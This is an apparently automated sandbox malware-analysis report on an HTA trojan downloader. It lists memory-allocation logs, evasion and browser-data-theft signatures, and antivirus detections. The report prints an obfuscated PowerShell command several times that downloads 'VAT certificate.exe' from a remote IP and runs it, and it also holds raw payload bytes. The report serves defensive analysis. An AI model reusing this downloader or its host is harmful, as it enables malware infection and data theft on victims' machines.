NtAllocateVirtualMemory June 9, 2024, 9:10 a.m.	process_identifier: 2160 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02504000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 9, 2024, 9:10 a.m.	process_identifier: 2160 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02505000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 9, 2024, 9:10 a.m.	process_identifier: 2160 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02506000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 9, 2024, 9:10 a.m.	process_identifier: 2160 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02507000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 9, 2024, 9:10 a.m.	process_identifier: 2160 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02508000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 9, 2024, 9:10 a.m.	process_identifier: 2160 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02509000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 9, 2024, 9:10 a.m.	process_identifier: 2160 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02920000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 9, 2024, 9:10 a.m.	process_identifier: 2160 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02921000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 9, 2024, 9:10 a.m.	process_identifier: 2160 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02922000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 9, 2024, 9:10 a.m.	process_identifier: 2160 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02923000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 9, 2024, 9:10 a.m.	process_identifier: 2160 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02924000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 9, 2024, 9:10 a.m.	process_identifier: 2160 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02925000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 9, 2024, 9:10 a.m.	process_identifier: 2160 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02926000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 9, 2024, 9:10 a.m.	process_identifier: 2160 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02927000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 9, 2024, 9:10 a.m.	process_identifier: 2160 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02928000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 9, 2024, 9:10 a.m.	process_identifier: 2160 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02929000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 9, 2024, 9:10 a.m.	process_identifier: 2160 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0292a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 9, 2024, 9:10 a.m.	process_identifier: 2160 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0292b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 9, 2024, 9:10 a.m.	process_identifier: 2160 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0292c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 9, 2024, 9:10 a.m.	process_identifier: 2160 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0292d000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 9, 2024, 9:10 a.m.	process_identifier: 2160 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0292e000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 9, 2024, 9:10 a.m.	process_identifier: 2160 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0292f000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 9, 2024, 9:10 a.m.	process_identifier: 2160 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02930000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 9, 2024, 9:10 a.m.	process_identifier: 2160 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02931000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 9, 2024, 9:10 a.m.	process_identifier: 2160 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02932000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 9, 2024, 9:10 a.m.	process_identifier: 2160 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02933000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 9, 2024, 9:10 a.m.	process_identifier: 2160 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02934000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1

A process attempted to delay the analysis task. (1 event)

description

netbtugc.exe tried to sleep 160 seconds, actually delayed analysis time by 160 seconds

Steals private information from local Internet browsers (4 events)

file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\
file	C:\Users\test22\AppData\Local\Chromium\User Data
file	C:\Users\test22\AppData\Local\MapleStudio\ChromePlus\User Data
file	C:\Users\test22\AppData\Local\Yandex\YandexBrowser\User Data

Creates executable files on the filesystem (2 events)

file	C:\Users\test22\AppData\Roaming\VAT%20certificate.exe
file	C:\Users\test22\AppData\Local\Temp\sqlite3.dll

Creates a shortcut to an executable file (1 event)

file	C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk

Creates a suspicious process (2 events)

cmdline

powershell.exe -ExecutionPolicy UnRestricted function tGIue($EpIxmuGVuZLbfA, $aTGikfPRsZRV){[IO.File]::WriteAllBytes($EpIxmuGVuZLbfA, $aTGikfPRsZRV)};function bXhQxPG($EpIxmuGVuZLbfA){if($EpIxmuGVuZLbfA.EndsWith((sJQmIfmn @(66989,67043,67051,67051))) -eq $True){rundll32.exe $EpIxmuGVuZLbfA }elseif($EpIxmuGVuZLbfA.EndsWith((sJQmIfmn @(66989,67055,67058,66992))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $EpIxmuGVuZLbfA}elseif($EpIxmuGVuZLbfA.EndsWith((sJQmIfmn @(66989,67052,67058,67048))) -eq $True){misexec /qn /i $EpIxmuGVuZLbfA}else{Start-Process $EpIxmuGVuZLbfA}};function EZaqwmkrpm($YYPOnwifQTinecw){$UnrKhxCyrLrSiUjqf = New-Object (sJQmIfmn @(67021,67044,67059,66989,67030,67044,67041,67010,67051,67048,67044,67053,67059));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$aTGikfPRsZRV = $UnrKhxCyrLrSiUjqf.DownloadData($YYPOnwifQTinecw);return $aTGikfPRsZRV};function sJQmIfmn($rdZrreW){$UDcOSFQvyucyt=66943;$hIpVaXCveA=$Null;foreach($LhcCvADFdJ in $rdZrreW){$hIpVaXCveA+=[char]($LhcCvADFdJ-$UDcOSFQvyucyt)};return $hIpVaXCveA};function VpeUnfmvvUnskxx(){$joDRUbaqCRhqCUu = $env:AppData + '\';$ZYEuq = $joDRUbaqCRhqCUu + 'VAT%20certificate.exe'; if (Test-Path -Path $ZYEuq){bXhQxPG $ZYEuq;}Else{ $rqdhhzPQQqHkKt = EZaqwmkrpm (sJQmIfmn @(67047,67059,67059,67055,67001,66990,66990,66992,67000,66999,66989,66993,66994,66989,66993,66991,66992,66989,66999,67000,66990,67062,67040,67057,67052,66990,67029,67008,67027,66980,66993,66991,67042,67044,67057,67059,67048,67045,67048,67042,67040,67059,67044,66989,67044,67063,67044));tGIue $ZYEuq $rqdhhzPQQqHkKt;bXhQxPG $ZYEuq;};;;;}VpeUnfmvvUnskxx;

cmdline

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function tGIue($EpIxmuGVuZLbfA, $aTGikfPRsZRV){[IO.File]::WriteAllBytes($EpIxmuGVuZLbfA, $aTGikfPRsZRV)};function bXhQxPG($EpIxmuGVuZLbfA){if($EpIxmuGVuZLbfA.EndsWith((sJQmIfmn @(66989,67043,67051,67051))) -eq $True){rundll32.exe $EpIxmuGVuZLbfA }elseif($EpIxmuGVuZLbfA.EndsWith((sJQmIfmn @(66989,67055,67058,66992))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $EpIxmuGVuZLbfA}elseif($EpIxmuGVuZLbfA.EndsWith((sJQmIfmn @(66989,67052,67058,67048))) -eq $True){misexec /qn /i $EpIxmuGVuZLbfA}else{Start-Process $EpIxmuGVuZLbfA}};function EZaqwmkrpm($YYPOnwifQTinecw){$UnrKhxCyrLrSiUjqf = New-Object (sJQmIfmn @(67021,67044,67059,66989,67030,67044,67041,67010,67051,67048,67044,67053,67059));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$aTGikfPRsZRV = $UnrKhxCyrLrSiUjqf.DownloadData($YYPOnwifQTinecw);return $aTGikfPRsZRV};function sJQmIfmn($rdZrreW){$UDcOSFQvyucyt=66943;$hIpVaXCveA=$Null;foreach($LhcCvADFdJ in $rdZrreW){$hIpVaXCveA+=[char]($LhcCvADFdJ-$UDcOSFQvyucyt)};return $hIpVaXCveA};function VpeUnfmvvUnskxx(){$joDRUbaqCRhqCUu = $env:AppData + '\';$ZYEuq = $joDRUbaqCRhqCUu + 'VAT%20certificate.exe'; if (Test-Path -Path $ZYEuq){bXhQxPG $ZYEuq;}Else{ $rqdhhzPQQqHkKt = EZaqwmkrpm (sJQmIfmn @(67047,67059,67059,67055,67001,66990,66990,66992,67000,66999,66989,66993,66994,66989,66993,66991,66992,66989,66999,67000,66990,67062,67040,67057,67052,66990,67029,67008,67027,66980,66993,66991,67042,67044,67057,67059,67048,67045,67048,67042,67040,67059,67044,66989,67044,67063,67044));tGIue $ZYEuq $rqdhhzPQQqHkKt;bXhQxPG $ZYEuq;};;;;}VpeUnfmvvUnskxx;

Drops an executable to the user AppData folder (2 events)

file	C:\Users\test22\AppData\Local\Temp\sqlite3.dll
file	C:\Users\test22\AppData\Roaming\VAT%20certificate.exe

A process created a hidden window (1 event)

Time & API	Arguments	Status	Return	Repeated
ShellExecuteExW June 9, 2024, 9:10 a.m.	show_type: 0 filepath_r: powershell.exe parameters: -ExecutionPolicy UnRestricted function tGIue($EpIxmuGVuZLbfA, $aTGikfPRsZRV){[IO.File]::WriteAllBytes($EpIxmuGVuZLbfA, $aTGikfPRsZRV)};function bXhQxPG($EpIxmuGVuZLbfA){if($EpIxmuGVuZLbfA.EndsWith((sJQmIfmn @(66989,67043,67051,67051))) -eq $True){rundll32.exe $EpIxmuGVuZLbfA }elseif($EpIxmuGVuZLbfA.EndsWith((sJQmIfmn @(66989,67055,67058,66992))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $EpIxmuGVuZLbfA}elseif($EpIxmuGVuZLbfA.EndsWith((sJQmIfmn @(66989,67052,67058,67048))) -eq $True){misexec /qn /i $EpIxmuGVuZLbfA}else{Start-Process $EpIxmuGVuZLbfA}};function EZaqwmkrpm($YYPOnwifQTinecw){$UnrKhxCyrLrSiUjqf = New-Object (sJQmIfmn @(67021,67044,67059,66989,67030,67044,67041,67010,67051,67048,67044,67053,67059));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$aTGikfPRsZRV = $UnrKhxCyrLrSiUjqf.DownloadData($YYPOnwifQTinecw);return $aTGikfPRsZRV};function sJQmIfmn($rdZrreW){$UDcOSFQvyucyt=66943;$hIpVaXCveA=$Null;foreach($LhcCvADFdJ in $rdZrreW){$hIpVaXCveA+=[char]($LhcCvADFdJ-$UDcOSFQvyucyt)};return $hIpVaXCveA};function VpeUnfmvvUnskxx(){$joDRUbaqCRhqCUu = $env:AppData + '\';$ZYEuq = $joDRUbaqCRhqCUu + 'VAT%20certificate.exe'; if (Test-Path -Path $ZYEuq){bXhQxPG $ZYEuq;}Else{ $rqdhhzPQQqHkKt = EZaqwmkrpm (sJQmIfmn @(67047,67059,67059,67055,67001,66990,66990,66992,67000,66999,66989,66993,66994,66989,66993,66991,66992,66989,66999,67000,66990,67062,67040,67057,67052,66990,67029,67008,67027,66980,66993,66991,67042,67044,67057,67059,67048,67045,67048,67042,67040,67059,67044,66989,67044,67063,67044));tGIue $ZYEuq $rqdhhzPQQqHkKt;bXhQxPG $ZYEuq;};;;;}VpeUnfmvvUnskxx; filepath: powershell.exe	1	1	0

Changes read-write memory protection to read-execute (probably to avoid detection when setting all RWX flags at the same time) (1 event)

Time & API	Arguments	Status	Return	Repeated
NtProtectVirtualMemory June 9, 2024, 9:10 a.m.	process_identifier: 1932 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 32 (PAGE_EXECUTE_READ) base_address: 0x7ef80000 process_handle: 0xffffffff	1	0	0

Checks adapter addresses which can be used to detect virtual network interfaces (1 event)

Time & API	Arguments	Status	Return	Repeated
GetAdaptersAddresses June 9, 2024, 9:10 a.m.	flags: 15 family: 0		111	0

URL downloaded by powershell script (1 event)

Data received

ÁèÂ@ÒÁ+ÂuAù')|Ý¸?Å%C÷îÁúòÁîòuíMu¶0¶A0F¶A0F¶A0Fë¤$¸ó§-4÷ïÁúúÁïúuí_^]ÃñU·¿K-Uìì¹kS3Ûÿ¸8pà÷éÑÁúÊÁéÊuë3ÀEø9EãMÁVMðWÿE¿vWEìEÿ¹$¾§»çb¸d4L÷ïÁúúÁïúuí¸¶¾ ÷éÁúÊÁéÊuíUþ¶zø¶¶Á¶ÀÀÂPWEôè!Ä¸D&¹öd$;ñLñHuøEô¸ëQ÷ëÁúÚÁëÚuí¶ÁMð2EÿMìEø@Eø;E,ÿÿÿ_^CÃ%yHÈø@uCû/|æ[å]Ã§Èéhó,!ÏÐìUìM3À8td$@<uù@PÿuQè¾òÿÿÄ]ÃF!ÇdRëåÕØUìM3Àf9tI@f<AuøEPÿuQèòÿÿÄ]ÃÌÌUìjÿuèÃ÷ÿÿÄÀt@]Ã3À]Ã ¸UìMW}ÀtVÑ÷fRfvÀuï^3À8t I|@uö3ÉfG_]Ã(!9ÖýÂ6?áõ:UìUEVuö~Wø+ú NRöó_^]ÃçóY8YæßÃUìMÉt¶EiÀVñW}Áéó«Îáóª_^E]ÃÌÌé«ûÿÿ»Ü¡Å/à¯-UìQVuöu3À^å]Ã~u2~ÆFtèèúÿÿ¯FëèÝúÿÿFÇF@]ÇFb"ÇF *@NÑÁ%ÿÿÁê3ÐF5Aýÿÿ#ÁNÁàSÁê3ÐÙÁÁèã>3ØF$5A}G#ÁNÁàWÁë3ØùÁ%ÿÁï 3øF5A}Gÿ#ÁV^ÁàÁï3ø~UüV òÁîÂ%þÿ3ðEÁî H(ñA}ÿÿ#ÊÁá 3ñp 3÷3ó3uü_Ñî[Æ^å]ÃÌUìSVuWÇØÇÌ¿¸øÇì¹¸øÇä±¸øÇðÁ¸øÆÈVè¹þÿÿÄÈd$¶Á;Er ;Eîöu3Éëç~u2~ÆFtèùÿÿ¯FëèùÿÿFÇF@]ÇFb"ÇF *@NÙÁ%ÿÿÁë3ØF5Aýÿÿ#ÁNÁàùÁë3ØÁÁèç>3øF$5A}G#ÁNÁàÑÁï3øÁ%ÿÁê 3ÐF5A}Gÿ#ÁN ÁàÁê3ÐÁÁèEÁ%þÿ1EF(Ám 5A}ÿÿ#ÁMÁà 3ÈN 3Ê3Ï3Ë^~VÑééÿÿÿ_^Á[]Ã4xW(ãNÙUìMUS[]Ã¨YÐxpã±F;XPÃH£ÑÂbÀVwN¹üÎÃÑuì®PÂ^lå ó÷ÉÍÅe1éÈíØìÙÈëx« Îúx #*,>uÈ'Mèå5Ãá(ã@hE÷ gýmNKóCtÍ3Ãu,±wzPÌEP|FFn0mFYey>ÁË8e*ÈîÖÍD@»>ù bëúXÖó+qîà¢R·ûcyÂíóþùþlÅ_¹^9'ÃL£oÆ|Z.®Ò§>PÅ¥>îft¯0ýèÙm`uSâ@~:¡ÊØ× fï£Tk#õ+{2ÏyQï8Sâ¥È3 áy@<H¯9¥Ád(îÊJM¤Fù[s§Ñäo²ù&,**y'Lê¼H¡;1^§t.,Ñ©ï´Fw¬1Hj;*Lïjsaá%ÃÅÜ'ú;68äiç¿æpí6aý-Þ¿®° »d9ÚgbìråÆ«Ò&çPj±%Xg0÷xMUÅGÝ Q7,6U=µsô§>»¿ä* oUc -*ÀÀ+tó¾Ö4w¸àÌwgH³9i1¶î=t/7üqé`ÿÝæ¨á¶·yÑó¿úÇ=æN»ßg¶]¥¤X¦û0g0¹2?*u²Ì4m¶VcóvRsWE±ÇK(ÅzÜ>8E)$N/xï=t$¿Ü"ÂréÐ*hµ7ó§@o¾,ë,Ï{§ârNåX¡°dõ~ä¬#¶U\ÞëÈ#|§{ú8%°§Ò·£Ê6wþN°~7MÊÒ|M.È7«Vöz ôTÃÂSSøÃ-KfÏÄlQ3gk&·c©i;ê 5G=ßòO1L+ÃÌOH!¨º;»j½0²$d ©¼û(©ª0ÈØ/¶:ÐÅÐ+8ÓAægÑTÅÄª~Q3Ò_ÁKlt.¨'¨^ÞoTs#zóÆGù'õD!ólr<ÿÌüîÓ)WÆZkNl¡ u'È¾¤{Áþ!°QBL k`³M=dÅbMý°¹òÜFKP!ªâÄõAÀëk¦|Kc°çÄcDtUiÅ(ÉUH (@ ¤m1NYÍ!ÿîâí?É>Ý½>¾Ò§L¢h¸úÑs\ÊöÊC¿`Rß0FÞ·äß6}5ÑØÈ/(H_Ð{<ÍteòÞËSaDG'ÝÂ¯ÛKë/g aUxB-ÎþõKÀÃðHßÝÙxòkõè;ëoÅC¥RRi¾¢("¢àÖÿ T«^Är²ë/rçêÀè:¾Ë ç )GH2Ôa¥.ò&+óâÛ-¥ÙÜ©o®©å9iÿ(!+ k¡o©9[NY)?ú»ØZº£6¸¦a/9aâÁ0RýUºFöþùÛ'F2¿SÓ1#òàîT¯kÀ5q¬©ÖÿTÛs}N÷ÛúU b ÜàsëJn¯ÐÊ;Êtêóá§àav¤¤ØÃåV}ò4gñ¥×´TòxêY`ZFæÄ0æmkAfä¦;ÿ/$tÇL3¡/Â'} ` :Ã²T<>X,ð/½t~9ìóµ`;ÈÙ#3®ÌÙ1îÇß*w(Î0}N81nbÈ,ÀiÓ6·séîã7<&a÷éö ^/@¡>×KÔjJ{BÔôïÛ½V~ÆzÀ¦wE°ÙÃÚá~nÓÚ5Vh°=Bsg/Y¼þ:j^BZ[Û³[KÓry.; G£ãL7:[T²¾´§?'o2E¥ãD¸|eÎiG»:»N¸´ËqçeãT¡2ÄwÆéÎº~ktI'¡,WXåh/ÏÁøÎS®Z6ó4=IBð o5,<¸|´7^ü'ºL. Çp»Öâ%¦»ãVÚ+|`çéò´ÞÈ3änÒOH\+ÙBößá'èR>HS6¬@Qw}µVDBÕÞüÁK×¦Bl8OÕp"L.A3¾û½æ;¢õ1xqñI"ÃY|ìMªüµéöNªqÆõV+C·E¦} zÑïîyouNö¯rGÇ«¤¯ãìûJgg1Ò6·á«|OgtCBæxqíÅTì,`×!T|ðç2=çÊÄ;{9_xÄE¶}n Í>Îbúâåæ6¿àX<â6Jq[xL{Â±Áécá«$>ô¿ÔKw/X¹ò{£lDîT}§ÐÈþ\ÓmI/ÜÁa¡[ûáp$ñFïÆäÝTvÁé¹%7äDÃ}=8AXAu;?.\slà?Ð*èGÅxü©|TL¥ÝiRÀÒ_×Z,á5F÷åÿð[ÙVWQSw 8]^³¨÷Yq¨õ×®ë# |CÑXaïüuÒPÐé7àÅÌ_çq-YäÎ8 à+Ã~®ëí\Í`Y¯ì+Å+Kã

Poweshell is sending data to a remote host (1 event)

Data sent

GET /warm/VAT%20certificate.exe HTTP/1.1 Host: 198.23.201.89 Connection: Keep-Alive

Checks for the Locally Unique Identifier on the system for a suspicious privilege (1 event)

Time & API	Arguments	Status	Return	Repeated
LookupPrivilegeValueW June 9, 2024, 9:10 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0

Communicates with host for which no DNS query was performed (1 event)

host

198.23.201.89

Attempts to identify installed AV products by installation directory (2 events)

file	C:\Users\test22\AppData\Local\AVAST Software\Browser\User Data
file	C:\Users\test22\AppData\Local\AVG\Browser\User Data

Drops a binary and executes it (1 event)

file	C:\Users\test22\AppData\Roaming\VAT%20certificate.exe

Network communications indicative of a potential document or script payload download was initiated by the process powershell.exe (1 event)

Time & API	Arguments	Status	Return	Repeated
send June 9, 2024, 9:10 a.m.	buffer: GET /warm/VAT%20certificate.exe HTTP/1.1 Host: 198.23.201.89 Connection: Keep-Alive socket: 1440 sent: 89	1	89	0

One or more non-whitelisted processes were created (2 events)

parent_process	powershell.exe				martian_process	C:\Users\test22\AppData\Roaming\VAT%20certificate.exe
parent_process	powershell.exe				martian_process	"C:\Users\test22\AppData\Roaming\VAT%20certificate.exe"

Creates a suspicious Powershell process (2 events)

option	-executionpolicy unrestricted				value	Attempts to bypass execution policy
option	-executionpolicy unrestricted				value	Attempts to bypass execution policy

File has been identified by 27 AntiVirus engines on VirusTotal as malicious (27 events)

Lionic	Trojan.Script.Valyria.a!c
Skyhigh	HTA/Downloader.f
ALYac	VB:Trojan.Valyria.7482
Arcabit	VB:Trojan.Valyria.D1D3A
Symantec	Trojan.Gen.NPE
ESET-NOD32	VBS/Agent.QVR
Avast	Script:SNH-gen [Drp]
Cynet	Malicious (score: 99)
Kaspersky	HEUR:Trojan-Downloader.Script.Generic
BitDefender	VB:Trojan.Valyria.7482
NANO-Antivirus	Trojan.Script.Downloader.jpdglv
MicroWorld-eScan	VB:Trojan.Valyria.7482
Emsisoft	VB:Trojan.Valyria.7482 (B)
F-Secure	Malware.VBS/Dldr.Agent.VPLT
FireEye	VB:Trojan.Valyria.7482
Ikarus	Trojan.VBS.Agent
Google	Detected
Avira	VBS/Dldr.Agent.VPLT
Kingsoft	Win32.Infected.AutoInfector.a
Microsoft	Trojan:VBS/AsyncRAT.RVC
GData	VB:Trojan.Valyria.7482
Varist	VBS/Agent.AZC!Eldorado
McAfee	HTA/Downloader.f
Tencent	Script.Trojan-Downloader.Generic.Vmhl
MAX	malware (ai score=86)
Fortinet	VBS/Agent.BSD!tr
AVG	Script:SNH-gen [Drp]

The process powershell.exe wrote an executable file to disk which it then attempted to execute (1 event)

file	C:\Users\test22\AppData\Roaming\VAT%20certificate.exe

wow123.hta

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All